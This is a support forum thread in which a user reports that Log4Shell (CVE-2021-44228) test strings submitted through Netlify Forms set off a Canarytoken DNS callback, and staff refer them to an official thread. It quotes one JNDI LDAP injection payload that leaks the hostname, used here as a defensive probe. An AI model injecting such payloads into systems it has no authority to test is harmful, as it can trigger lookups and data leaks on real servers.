Home
Support Forums

Netlify Forms Submission and Lambda Functions and Log4j Vulnerability CVE-2021-44228

Hello,

I have a custom form on my website and a webhook which triggers a lambda function and I used https://canarytokens.org/ to test/verify the log4shell vulnerability and when the data is submited via netlify forms and called on lambda function the token were activated.

Note: Our lambda function in netlify doesn’t post the data to any external system and it’s interely in NodeJS.

We have followed this tutorial here: https://twitter.com/ThinkstCanary/status/1469439743905697797
and used some form fields that are posted to netlify and we have noticed that the token dns query was made.

Thanks

Hi @luksdev

Are you suggesting that Netlify Forms/Netilfy Functions are susceptible to log4j?

Hello @coelmay,

I am not sure but as my lambda function is not using any external service and only netlify forms and netlify forms webhooks/notifications I am trying to understand where/which service is doing the query to the canary DNS.

To understand more here is the tutorial: Using a Canarytoken to help test for CVE-2021-44228 (log4j/log4shell) – Thinkst Canary

I have submited my forms and replace the fields like name, text to JDNI ${jndi:ldap://x${hostName}.L4J. INSERT-COPIED-STRING-HERE /a} and the token received a DNS query, meaning that someone did query that token. So I am wondering who/where is the problem.

I have contacted netlify and have the full report with the IP but didn’t receive an answer yet.

Hey there @luksdev :wave

You can follow the conversation about log4j here. Our security team is investigating.

If you have questions about form functionality or believe there is an error, we can continue the conversation about your form. If not, please head over to the other thread.

Hello Hillary, due the high risk on this issue is not possible for someone to advise and get in touch on this regards? I have all the logs including the IP of the servers that triggered the DNS query again the ldap string from canary token.

1 Like

@luksdev check out Please Read: Regarding Log4j / Log4Shell vulnerability on Netlify's service and your sites for more information on Log4j and Netlify.

2 Likes

Thanks, @coelmay! @luksdev, please follow up in that thread if you have any further questions. We appreciate it!

1 Like